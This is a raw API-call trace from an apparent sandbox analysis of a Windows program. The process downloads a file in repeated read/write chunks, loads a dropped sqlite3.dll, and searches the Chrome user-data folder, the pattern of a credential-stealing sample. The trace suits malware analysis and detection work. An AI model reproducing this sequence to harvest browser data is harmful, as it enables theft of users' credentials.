dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.677] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.677] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.738] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.738] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.738] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.739] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.739] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.739] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.739] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.739] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.743] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.743] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.743] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.743] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.744] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.744] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.744] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.744] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.744] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.745] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.745] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.745] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.745] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.745] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.745] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.746] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.746] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.746] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.746] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.746] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.746] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.747] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.747] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.747] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.747] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.747] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.747] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.748] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.748] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.749] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.750] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.750] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.750] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.750] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.751] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.751] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.751] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.751] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.751] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.751] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.752] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.752] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.752] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.752] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.752] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.752] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.752] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.753] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.753] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.753] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.753] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.753] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.753] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.753] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.754] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.754] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.754] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.754] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.754] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.754] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.754] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.755] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.755] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.755] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.755] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.755] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.755] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.755] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.756] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.756] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.756] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.781] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0206.861] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0206.862] GetProcessHeap () returned 0x5b0000 [0206.862] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xf423f) returned 0x8d86020 [0206.868] LoadLibraryA (lpLibFileName="C:\\ProgramData\\sqlite3.dll") returned 0x60900000 [0206.960] malloc (_Size=0x80) returned 0x5804a0 [0206.961] __dllonexit () returned 0x609011d0 [0206.961] __dllonexit () returned 0x6096d420 [0206.961] GetProcAddress (hModule=0x60900000, lpProcName="sqlite3_open") returned 0x6096ce31 [0206.962] GetProcAddress (hModule=0x60900000, lpProcName="sqlite3_prepare_v2") returned 0x6095ec76 [0206.962] GetProcAddress (hModule=0x60900000, lpProcName="sqlite3_step") returned 0x60949b66 [0206.962] GetProcAddress (hModule=0x60900000, lpProcName="sqlite3_column_text") returned 0x6091d54f [0206.963] GetProcAddress (hModule=0x60900000, lpProcName="sqlite3_finalize") returned 0x6094064b [0206.963] GetProcAddress (hModule=0x60900000, lpProcName="sqlite3_close") returned 0x6093a510 [0206.963] GetProcAddress (hModule=0x60900000, lpProcName="sqlite3_column_bytes") returned 0x6091d5dc [0206.963] GetProcAddress (hModule=0x60900000, lpProcName="sqlite3_column_blob") returned 0x6091d57e [0206.963] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0206.984] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data" [0206.984] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data" [0206.984] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" [0206.984] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\local state")) returned 0xffffffff [0206.988] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*") returned 61 [0206.989] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.990] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.990] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.990] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.990] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.990] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.990] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0206.990] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0206.990] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 